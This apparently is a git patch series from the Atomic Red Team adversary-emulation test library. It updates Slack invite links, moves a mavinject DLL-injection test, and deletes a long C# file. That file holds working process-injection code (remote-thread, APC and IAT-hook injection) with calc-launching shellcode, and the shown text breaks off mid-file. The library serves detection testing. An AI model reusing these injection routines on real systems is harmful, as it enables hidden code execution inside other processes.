From a8d45abe94e4c2ddca4fa00e05c3f0b9d90581e9 Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Thu, 11 Mar 2021 15:15:00 -0800
Subject: [PATCH 1/7] Update the Slack Invite Request URL
The web app for requesting a Slack invite no longer works due to a deprecated Slack API call. Moving requests to a (Red Canary provided) Google Form.
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 7c0d1a5efe..a125885198 100644
--- a/README.md
+++ b/README.md
@@ -47,7 +47,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr
* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
- * Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
+ * Need a Slack invitation? Submit an invite request via this [Google Form](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)
## Code of Conduct
From b72f5785ac1752121501a498a9baf642ae89528c Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Fri, 12 Mar 2021 10:02:09 -0800
Subject: [PATCH 2/7] Update Slack Invite on Website
Also updating the URL on the atomicredteam.io website.
---
docs/_layouts/default.html | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/_layouts/default.html b/docs/_layouts/default.html
index f90bd0c6aa..80f8ca1fd4 100644
--- a/docs/_layouts/default.html
+++ b/docs/_layouts/default.html
@@ -31,7 +31,7 @@
{{ site.description | default: site.github.project_t
APIs
Related
View on GitHub
- Join on Slack
+ Join on Slack
From 80415a586f1aa857de8b9945029463c18806458e Mon Sep 17 00:00:00 2001
From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com>
Date: Sat, 13 Mar 2021 09:22:36 -0500
Subject: [PATCH 3/7] Moving mavinject test to T1055.001 and src cleanup #1404
(#1405)
* Moving mavinject test to T1055.001 and src cleanup #1404
* Adding Windows Command Prompt test
* Adding rundll32.exe test
Co-authored-by: Carrie Roberts
---
atomics/T1055.001/T1055.001.yaml | 36 +
.../T1055.cpp => T1055.001/src/T1055.001.cpp} | 0
.../src/Win32/T1055.001.dll} | Bin
.../src/x64/T1055.001.dll} | Bin
atomics/T1055/T1055.yaml | 33 -
atomics/T1055/src/Linux/T1055.c | 22 -
atomics/T1055/src/T1055.cs | 1147 -----------------
atomics/T1055/src/x64/T1055-macrocode.txt | 0
atomics/T1059.003/T1059.003.yaml | 20 +
atomics/T1218.011/T1218.011.yaml | 15 +
10 files changed, 71 insertions(+), 1202 deletions(-)
create mode 100644 atomics/T1055.001/T1055.001.yaml
rename atomics/{T1055/src/T1055.cpp => T1055.001/src/T1055.001.cpp} (100%)
rename atomics/{T1055/src/Win32/T1055.dll => T1055.001/src/Win32/T1055.001.dll} (100%)
rename atomics/{T1055/src/x64/T1055.dll => T1055.001/src/x64/T1055.001.dll} (100%)
delete mode 100644 atomics/T1055/src/Linux/T1055.c
delete mode 100644 atomics/T1055/src/T1055.cs
mode change 100644 => 100755 atomics/T1055/src/x64/T1055-macrocode.txt
diff --git a/atomics/T1055.001/T1055.001.yaml b/atomics/T1055.001/T1055.001.yaml
new file mode 100644
index 0000000000..d04863bbf9
--- /dev/null
+++ b/atomics/T1055.001/T1055.001.yaml
@@ -0,0 +1,36 @@
+attack_technique: T1055.001
+display_name: 'Process Injection: Dynamic-link Library Injection'
+atomic_tests:
+- name: Process Injection via mavinject.exe
+ auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
+ description: |
+ Windows 10 Utility To Inject DLLS.
+
+ Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
+ With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_id:
+ description: PID of input_arguments
+ type: Integer
+ default: (Start-Process notepad -PassThru).id
+ dll_payload:
+ description: DLL to Inject
+ type: Path
+ default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Utility to inject must exist on disk at specified location (#{dll_payload})
+ prereq_command: |
+ if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
+ executor:
+ command: |
+ $mypid = #{process_id}
+ mavinject $mypid /INJECTRUNNING #{dll_payload}
+ name: powershell
+ elevation_required: true
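Review bot: The description of the new test still names `T1055.dll` in both sentences of the "Upon successful execution" line, while the `dll_payload` default and the `Invoke-WebRequest` URL in the same hunk use `T1055.001.dll`; the text should read `powershell.exe will download T1055.001.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.001.dll.` so readers and anyone auditing the expected on-disk artifact see the right filename. The `process_id` description `PID of input_arguments` does not describe the argument; `PID of the target process to inject into` would. The `prereq_command` tests `Test-Path #{dll_payload}` unquoted, so an override of `dll_payload` containing a space would break the check even though the `Invoke-WebRequest` line below quotes the same value; `if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}` keeps the two consistent.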
diff --git a/atomics/T1055/src/T1055.cpp b/atomics/T1055.001/src/T1055.001.cpp
similarity index 100%
rename from atomics/T1055/src/T1055.cpp
rename to atomics/T1055.001/src/T1055.001.cpp
diff --git a/atomics/T1055/src/Win32/T1055.dll b/atomics/T1055.001/src/Win32/T1055.001.dll
similarity index 100%
rename from atomics/T1055/src/Win32/T1055.dll
rename to atomics/T1055.001/src/Win32/T1055.001.dll
diff --git a/atomics/T1055/src/x64/T1055.dll b/atomics/T1055.001/src/x64/T1055.001.dll
similarity index 100%
rename from atomics/T1055/src/x64/T1055.dll
rename to atomics/T1055.001/src/x64/T1055.001.dll
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index 4a318d4655..9e6790ce47 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -1,39 +1,6 @@
attack_technique: T1055
display_name: Process Injection
atomic_tests:
-- name: Process Injection via mavinject.exe
- auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
- description: |
- Windows 10 Utility To Inject DLLS.
-
- Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
- With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
- supported_platforms:
- - windows
- input_arguments:
- process_id:
- description: PID of input_arguments
- type: Integer
- default: (Start-Process notepad -PassThru).id
- dll_payload:
- description: DLL to Inject
- type: Path
- default: PathToAtomicsFolder\T1055\src\x64\T1055.dll
- dependency_executor_name: powershell
- dependencies:
- - description: |
- Utility to inject must exist on disk at specified location (#{dll_payload})
- prereq_command: |
- if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
- get_prereq_command: |
- New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"
- executor:
- command: |
- $mypid = #{process_id}
- mavinject $mypid /INJECTRUNNING #{dll_payload}
- name: powershell
- elevation_required: true
- name: Shellcode execution via VBA
auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
description: |
diff --git a/atomics/T1055/src/Linux/T1055.c b/atomics/T1055/src/Linux/T1055.c
deleted file mode 100644
index 6986239047..0000000000
--- a/atomics/T1055/src/Linux/T1055.c
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- Atomic Red Team Shared Object Library
- Uses code inspired by Zombie Ant Farm (https://github.com/dsnezhkov/zombieant)
-
- Compilation
- -------------
- gcc -shared -fPIC -o ../bin/T1055.so T1055.c
-*/
-
-#include
-
-static void init(int argc, char **argv, char **envp) {
- printf("Loaded Atomic Red Team Library successfully!\n");
-}
-
-static void fini(void) {
- printf("Unloading Atomic Red Team preload...\n");
-}
-
-
-__attribute__((section(".init_array"), used)) static typeof(init) *init_p = init;
-__attribute__((section(".fini_array"), used)) static typeof(fini) *fini_p = fini;
\ No newline at end of file
diff --git a/atomics/T1055/src/T1055.cs b/atomics/T1055/src/T1055.cs
deleted file mode 100644
index 9f43822f8f..0000000000
--- a/atomics/T1055/src/T1055.cs
+++ /dev/null
@@ -1,1147 +0,0 @@
-//Atomic Process Injection Tests
-//xref: https://github.com/pwndizzle/c-sharp-memory-injection
-
-// https://github.com/peterferrie/win-exec-calc-shellcode
-
-// To run:
-// 1. Compile code - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:..\bin\T1055.exe T1055.cs
-//
-
-
-
-using System;
-using System.Reflection;
-using System.Diagnostics;
-using System.Runtime.InteropServices;
-using System.IO;
-using System.IO.Compression;
-using System.Collections.Generic;
-using System.ComponentModel;
-using System.Text;
-
-public class ProcessInject
-{
- [DllImport("kernel32.dll")]
- public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
-
- [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
- public static extern IntPtr GetModuleHandle(string lpModuleName);
-
- [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
- static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
-
- [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
- static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
-
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
-
- [DllImport("kernel32.dll")]
- static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
-
- [DllImport("kernel32.dll")]
- static extern IntPtr CreateRemoteThread(IntPtr hProcess,
- IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-
- // privileges
- const int PROCESS_CREATE_THREAD = 0x0002;
- const int PROCESS_QUERY_INFORMATION = 0x0400;
- const int PROCESS_VM_OPERATION = 0x0008;
- const int PROCESS_VM_WRITE = 0x0020;
- const int PROCESS_VM_READ = 0x0010;
-
- // used for memory allocation
- const uint MEM_COMMIT = 0x00001000;
- const uint MEM_RESERVE = 0x00002000;
- const uint PAGE_READWRITE = 4;
-
- public static int Inject()
- {
-
- // Get process id
- Console.WriteLine("Get process by name...");
- System.Diagnostics.Process.Start("notepad");
- Process targetProcess = Process.GetProcessesByName("notepad")[0];
-
-
- // Get handle of the process - with required privileges
-
- IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
-
-
- // Get address of LoadLibraryA and store in a pointer
-
- IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
-
-
- // Path to dll that will be injected
- string dllName = @"C:\AtomicRedTeam\atomics\T1055\bin\w64-exec-calc-shellcode.dll";
-
- // Allocate memory for dll path and store pointer
-
- IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
-
- // Write path of dll to memory
-
- UIntPtr bytesWritten;
- bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, System.Text.Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
-
- // Read contents of memory
- int bytesRead = 0;
- byte[] buffer = new byte[24];
-
- ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
- Console.WriteLine("Data in memory: " + System.Text.Encoding.UTF8.GetString(buffer));
-
- // Create a thread that will call LoadLibraryA with allocMemAddress as argument
-
- CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
-
- return 0;
- }
-}
-
-public class ApcInjectionAnyProcess
-{
- public static void Inject()
- {
-
- byte[] shellcode = new byte[112] {
- 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
- };
-
- // Open process. "explorer" is a good target due to the large number of threads which will enter alertable state
- Process targetProcess = Process.GetProcessesByName("notepad")[0];
- IntPtr procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
-
- // Allocate memory within process and write shellcode
- IntPtr resultPtr = VirtualAllocEx(procHandle, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- IntPtr bytesWritten = IntPtr.Zero;
- bool resultBool = WriteProcessMemory(procHandle,resultPtr,shellcode,shellcode.Length, out bytesWritten);
-
- // Modify memory permissions on shellcode from XRW to XR
- uint oldProtect = 0;
- resultBool = VirtualProtectEx(procHandle, resultPtr, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
-
- // Iterate over threads and queueapc
- foreach (ProcessThread thread in targetProcess.Threads)
- {
- //Get handle to thread
- IntPtr tHandle = OpenThread(ThreadAccess.THREAD_HIJACK, false, (int)thread.Id);
-
- //Assign APC to thread to execute shellcode
- IntPtr ptr = QueueUserAPC(resultPtr, tHandle, IntPtr.Zero);
- }
- }
-
- // Memory permissions
- private static UInt32 MEM_COMMIT = 0x1000;
- private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
- //private static UInt32 PAGE_READWRITE = 0x04;
- private static UInt32 PAGE_EXECUTE_READ = 0x20;
-
- // Process privileges
- const int PROCESS_CREATE_THREAD = 0x0002;
- const int PROCESS_QUERY_INFORMATION = 0x0400;
- const int PROCESS_VM_OPERATION = 0x0008;
- const int PROCESS_VM_WRITE = 0x0020;
- const int PROCESS_VM_READ = 0x0010;
-
- [Flags]
- public enum ThreadAccess : int
- {
- TERMINATE = (0x0001),
- SUSPEND_RESUME = (0x0002),
- GET_CONTEXT = (0x0008),
- SET_CONTEXT = (0x0010),
- SET_INFORMATION = (0x0020),
- QUERY_INFORMATION = (0x0040),
- SET_THREAD_TOKEN = (0x0080),
- IMPERSONATE = (0x0100),
- DIRECT_IMPERSONATION = (0x0200),
- THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
- THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
- }
-
- [DllImport("kernel32.dll", SetLastError = true)]
- public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
- int dwThreadId);
-
- [DllImport("kernel32.dll",SetLastError = true)]
- public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
-
- [DllImport("kernel32.dll")]
- public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
-
- [DllImport("kernel32")]
- public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
- Int32 size, UInt32 flAllocationType, UInt32 flProtect);
-
- [DllImport("kernel32.dll", SetLastError = true )]
- public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
- Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
-
- [DllImport("kernel32.dll", SetLastError = true)]
- public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
-
- [DllImport("kernel32.dll")]
- public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
- int dwSize, uint flNewProtect, out uint lpflOldProtect);
-}
-
-public class ApcInjectionNewProcess
-{
- public static void Inject()
- {
-
- byte[] shellcode = new byte[112] {
- 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
- };
-
- // Target process to inject into
- string processpath = @"C:\Windows\notepad.exe";
- STARTUPINFO si = new STARTUPINFO();
- PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
-
- // Create new process in suspended state to inject into
- bool success = CreateProcess(processpath, null,
- IntPtr.Zero, IntPtr.Zero, false,
- ProcessCreationFlags.CREATE_SUSPENDED,
- IntPtr.Zero, null, ref si, out pi);
-
- // Allocate memory within process and write shellcode
- IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);
- IntPtr bytesWritten = IntPtr.Zero;
- bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);
-
- // Open thread
- IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
- uint oldProtect = 0;
-
- // Modify memory permissions on allocated shellcode
- resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect);
-
- // Assign address of shellcode to the target thread apc queue
- IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
-
- IntPtr ThreadHandle = pi.hThread;
- ResumeThread(ThreadHandle);
-
- }
-
-
- private static UInt32 MEM_COMMIT = 0x1000;
-
- //private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR ;-)
- private static UInt32 PAGE_READWRITE = 0x04;
- private static UInt32 PAGE_EXECUTE_READ = 0x20;
-
-
- [Flags]
- public enum ProcessAccessFlags : uint
- {
- All = 0x001F0FFF,
- Terminate = 0x00000001,
- CreateThread = 0x00000002,
- VirtualMemoryOperation = 0x00000008,
- VirtualMemoryRead = 0x00000010,
- VirtualMemoryWrite = 0x00000020,
- DuplicateHandle = 0x00000040,
- CreateProcess = 0x000000080,
- SetQuota = 0x00000100,
- SetInformation = 0x00000200,
- QueryInformation = 0x00000400,
- QueryLimitedInformation = 0x00001000,
- Synchronize = 0x00100000
- }
-
- [Flags]
- public enum ProcessCreationFlags : uint
- {
- ZERO_FLAG = 0x00000000,
- CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
- CREATE_DEFAULT_ERROR_MODE = 0x04000000,
- CREATE_NEW_CONSOLE = 0x00000010,
- CREATE_NEW_PROCESS_GROUP = 0x00000200,
- CREATE_NO_WINDOW = 0x08000000,
- CREATE_PROTECTED_PROCESS = 0x00040000,
- CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
- CREATE_SEPARATE_WOW_VDM = 0x00001000,
- CREATE_SHARED_WOW_VDM = 0x00001000,
- CREATE_SUSPENDED = 0x00000004,
- CREATE_UNICODE_ENVIRONMENT = 0x00000400,
- DEBUG_ONLY_THIS_PROCESS = 0x00000002,
- DEBUG_PROCESS = 0x00000001,
- DETACHED_PROCESS = 0x00000008,
- EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
- INHERIT_PARENT_AFFINITY = 0x00010000
- }
- public struct PROCESS_INFORMATION
- {
- public IntPtr hProcess;
- public IntPtr hThread;
- public uint dwProcessId;
- public uint dwThreadId;
- }
- public struct STARTUPINFO
- {
- public uint cb;
- public string lpReserved;
- public string lpDesktop;
- public string lpTitle;
- public uint dwX;
- public uint dwY;
- public uint dwXSize;
- public uint dwYSize;
- public uint dwXCountChars;
- public uint dwYCountChars;
- public uint dwFillAttribute;
- public uint dwFlags;
- public short wShowWindow;
- public short cbReserved2;
- public IntPtr lpReserved2;
- public IntPtr hStdInput;
- public IntPtr hStdOutput;
- public IntPtr hStdError;
- }
-
- [Flags]
- public enum ThreadAccess : int
- {
- TERMINATE = (0x0001) ,
- SUSPEND_RESUME = (0x0002) ,
- GET_CONTEXT = (0x0008) ,
- SET_CONTEXT = (0x0010) ,
- SET_INFORMATION = (0x0020) ,
- QUERY_INFORMATION = (0x0040) ,
- SET_THREAD_TOKEN = (0x0080) ,
- IMPERSONATE = (0x0100) ,
- DIRECT_IMPERSONATION = (0x0200)
- }
-
- [DllImport("kernel32.dll", SetLastError = true)]
- public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
- int dwThreadId);
-
- [DllImport("kernel32.dll",SetLastError = true)]
- public static extern bool WriteProcessMemory(
- IntPtr hProcess,
- IntPtr lpBaseAddress,
- byte[] lpBuffer,
- int nSize,
- out IntPtr lpNumberOfBytesWritten);
-
- [DllImport("kernel32.dll")]
- public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
-
- [DllImport("kernel32")]
- public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
- Int32 size, UInt32 flAllocationType, UInt32 flProtect);
- [DllImport("kernel32.dll", SetLastError = true )]
- public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
- Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
-
- [DllImport("kernel32.dll", SetLastError = true)]
- public static extern IntPtr OpenProcess(
- ProcessAccessFlags processAccess,
- bool bInheritHandle,
- int processId
- );
-
-
- [DllImport("kernel32.dll")]
- public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
- [DllImport("kernel32.dll")]
- public static extern uint ResumeThread(IntPtr hThread);
- [DllImport("kernel32.dll")]
- public static extern uint SuspendThread(IntPtr hThread);
- [DllImport("kernel32.dll")]
- public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
- int dwSize, uint flNewProtect, out uint lpflOldProtect);
-}
-
-public class IatInjection
-{
-
- public static void Inject()
- {
- string targetProcName = "notepad";
- string targetFuncName = "CreateFileW";
-
- // Get target process id and read memory contents
- Process process = Process.GetProcessesByName(targetProcName)[0];
- IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, process.Id);
- int bytesRead = 0;
- byte[] fileBytes = new byte[process.WorkingSet64];
- ReadProcessMemory(hProcess, process.MainModule.BaseAddress, fileBytes, fileBytes.Length, ref bytesRead);
-
- // The DOS header
- IMAGE_DOS_HEADER dosHeader;
-
- // The file header
- IMAGE_FILE_HEADER fileHeader;
-
- // Optional 32 bit file header
- IMAGE_OPTIONAL_HEADER32 optionalHeader32 = new IMAGE_OPTIONAL_HEADER32();
-
- // Optional 64 bit file header
- IMAGE_OPTIONAL_HEADER64 optionalHeader64 = new IMAGE_OPTIONAL_HEADER64();
-
- // Image Section headers
- IMAGE_SECTION_HEADER[] imageSectionHeaders;
-
- // Import descriptor for each DLL
- IMAGE_IMPORT_DESCRIPTOR[] importDescriptors;
-
- // Convert file bytes to memorystream and use reader
- MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length);
- BinaryReader reader = new BinaryReader(stream);
-
- //Begin parsing structures
- dosHeader = FromBinaryReader(reader);
-
- // Add 4 bytes to the offset
- stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
-
- UInt32 ntHeadersSignature = reader.ReadUInt32();
- fileHeader = FromBinaryReader(reader);
- if (Is32BitHeader(fileHeader))
- {
- optionalHeader32 = FromBinaryReader(reader);
- }
- else
- {
- optionalHeader64 = FromBinaryReader(reader);
- }
-
- imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
- for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
- {
- imageSectionHeaders[headerNo] = FromBinaryReader(reader);
- }
-
- // Go to ImportTable and parse every imported DLL
- stream.Seek((long)((ulong)optionalHeader64.ImportTable.VirtualAddress), SeekOrigin.Begin);
- importDescriptors = new IMAGE_IMPORT_DESCRIPTOR[50];
-
- for (int i = 0; i < 50; i++)
- {
- importDescriptors[i] = FromBinaryReader(reader);
- }
- bool flag = false;
- int j = 0;
-
- // The below is really hacky, would have been better to use structures!
- while (j < importDescriptors.Length && !flag)
- {
- for (int k = 0; k < 1000; k++)
- {
- // Get the address for the function and its name
-
- stream.Seek(importDescriptors[j].OriginalFirstThunk + (k * 8), SeekOrigin.Begin);
-
- long nameOffset = reader.ReadInt64();
- if (nameOffset > 1000000 || nameOffset < 0)
- {
- break;
- }
-
- // Get the function name
- stream.Seek(nameOffset + 2, SeekOrigin.Begin);
- List list = new List();
- byte[] array;
- do
- {
- array = reader.ReadBytes(1);
- list.Add(Encoding.Default.GetString(array));
- }
- while (array[0] != 0);
- string curFuncName = string.Join(string.Empty, list.ToArray());
- curFuncName = curFuncName.Substring(0, curFuncName.Length - 1);
-
- // Get the offset of the pointer to the target function and its current value
- long funcOffset = importDescriptors[j].FirstThunk + (k * 8);
- stream.Seek(funcOffset, SeekOrigin.Begin);
- long curFuncAddr = reader.ReadInt64();
-
- // Found target function, modify address to point to shellcode
- if (curFuncName == targetFuncName)
- {
-
- // WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
- // nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
- byte[] payload = new byte[111] {
- 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58
- };
-
- // Once shellcode has executed go to real import (mov to rax then jmp to address)
- byte[] mov_rax = new byte[2] {
- 0x48, 0xb8
- };
- byte[] jmp_address = BitConverter.GetBytes(curFuncAddr);
- byte[] jmp_rax = new byte[2] {
- 0xff, 0xe0
- };
-
- // Build shellcode
- byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
- payload.CopyTo(shellcode, 0);
- mov_rax.CopyTo(shellcode, payload.Length);
- jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
- jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
-
- // Allocate memory for shellcode
